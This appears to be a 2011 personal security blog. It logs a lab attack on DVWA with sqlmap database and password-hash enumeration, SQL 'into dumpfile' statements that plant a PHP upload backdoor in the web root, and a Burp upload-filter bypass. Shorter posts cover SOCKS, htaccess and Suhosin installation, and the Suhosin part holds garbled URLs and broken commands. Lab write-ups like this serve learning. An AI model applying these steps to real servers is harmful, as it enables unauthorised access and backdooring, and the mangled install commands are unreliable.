Sunday, July 24, 2011

SQL DUMFILE

web vulner : http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=%27&Submit=Submit#
and i tried to type in sqlmap :
root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.102/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie='PHPSESSID=ahh7j1bsrtrs5qtjn8tgpcp4g2; security=low' --dbs

then i get :
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL >= 5.0.0
[11:55:00] [INFO] fetching database names
available databases [14]:
[*] abal2
[*] auracms
[*] auracms1
[*] cdcol
[*] dvwa
[*] information_schema
[*] joomla
[*] joomla1
[*] mysql
[*] phpmyadmin
[*] test
[*] upload
[*] wordpress
[*] wordpress2

after type :

root@archaveliano-laptop:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=27&Submit=Submit" --cookie="PHPSESSID=lp7qif2ecvd2lod7rp3unddfs1; security=low" --password

and then i get :

web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5
[11:56:26] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[11:56:29] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[11:56:29] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL


now, i have 2 user, first pma, and second root, with no password.


after i get password and user mysql, i login into sql, wth url :
192.168.56.102/phpmyadmin
 then i create the database with name : bd
and i create the table for upload

second i create table for form :
after create database and table, results can be seen like this :
then i insert the syntax sql like this :
for dump the file, type :
1. select * into dumpfile '/opt/lampp/htdocs/kotak.html' from kotak;
2. select * into dumpfile '/opt/lampp/htdocs/unggah_file.php' from unggah_file;

 it's finished for upload backdoor.
192.168.56.102/kotak.html

but any script error. 

-=CMIIW=-

Tuesday, July 19, 2011

the difference between socks 4, and socks 5

SOCKS is a standard protocol, designed to handle TCP traffic through proxy servers. Currently, there are two implementations of the SOCKS protocol is used, the SOCKS version 4 (SOCKS4) and SOCKS version 5 (SOCKS5). The main difference between the two versions is the SOCKS5 provide additional security through authentication.  
SOCKS5 TCP is compatible with most applications. It also provides a basic firewall capabilities, because it authenticates the incoming and outgoing packets and can provide network address translation (NAT).

CMIIW

Wednesday, July 13, 2011

what is htaccess

when we open a web page, of course, we've opened a web page that looks "404 Error" or "can not find the page"

Here are some of functions. Htaccess:
- Mem-protection Folders / Protect Folder with password
- Forward visitors to your website with automatic
- Create a page of your own error message display
- Reject the visitors with certain IP addresses
- Change your file extension
- Only allow certain visitors by IP Address
- Allow / Reject list directory

Monday, July 11, 2011

web and system

Now, I am learning into a web, put the backdoor, and exploit the system.
there is a lack of web vulnerabilities in both the file upload, the upload feature is already filtered, so it can only upload jpeg files.
I use Burp suite, then to intercept and replace it, so in addition to jpeg files can be uploaded.
backdoor.php I upload, so that the web is already my the backdoor.
then I go into the backdoor, and try to exploit the system.


I am very much a reference, using Exploitation in www.exploit-db.com, etc.. I tried to use various exploits to exploit to the kernel, and it turns out, the kernel of the system is already in the patch, making it more likely for her exploits of the kernel is very small.

My suggestion: in exploiting system, not just the kernel that can exploit, but could be from the application side, and its developer.
  

Sunday, July 10, 2011

PHP SUHOSIN

Suhosin is an advanced protection system for PHP installations. designed for
protect servers and users of the defects that are recognized or unrecognized
in PHP applications and the PHP core. Suhosin comes in two parts
independent, can be used separately or combined.

Patches and the Suhosin extension can be downloaded at http://www.hardened-php.net/suhosin/download.html


installation
Preparation
If you want to install PHP with Suhosin-Patch you must first

doing some preparatory steps.

 
Step 1: installation signaturekey hardened-PHP Project
First you grab a copy of darihttp: / / www.harde php.ne ne d-t / d ne harde-
php-signature-key.asc and import it into your keychain GNU Privacy Guard
 


#> gpg --import < hardened-php-signature-key.asc
gpg: /root/.gnupg/trustdb.gpg: trust-db erzeugt
gpg: key 0A864AA1: public key "Hardened-PHP Signature Key" imported
gpg: Anzahl insgesamt bearbeiteter Schlüssel: 1
gpg:
importiert: 1
 
Step 2: download and check the necessary files

Now it's time to grab a copy of the PHP tarball newest and latest version of suhosin-patch. In addition, you must obtain a digital signature (*. sig) files. You can grab all of this in http://www.hardened-php.net/suhosin/download.html


As a first precaution you can check the MD5 hash of the file
download of the people you find on the download page

#> Md5sum php-5.1.4.tar.bz2
66a806161d4a2d3b5153ebe4cd0f2e1c php-5.1.4.tar.bz2
#> Md5sum suhosin-patch-5.1.4-0.9.0.patch.gz
 
ea9026495c4ce34a329fd0a87474f1ba suhosin-patch-5.1.4-0.9.0.patch.gz

Step 3: Unpacking and Patching
You must now unpack the PHP tarball, gunzip patchfile and then
apply the patch.

#> Tar-xfj php-5.1.4.tar.bz2
#> Gunzip suhosin-patch-5.1.4-0.9.0.patch.gz
#> Cd php-5.1.4
#> Patch-p 1-i ../suhosin-patch-5.1.4-0.9.0.patch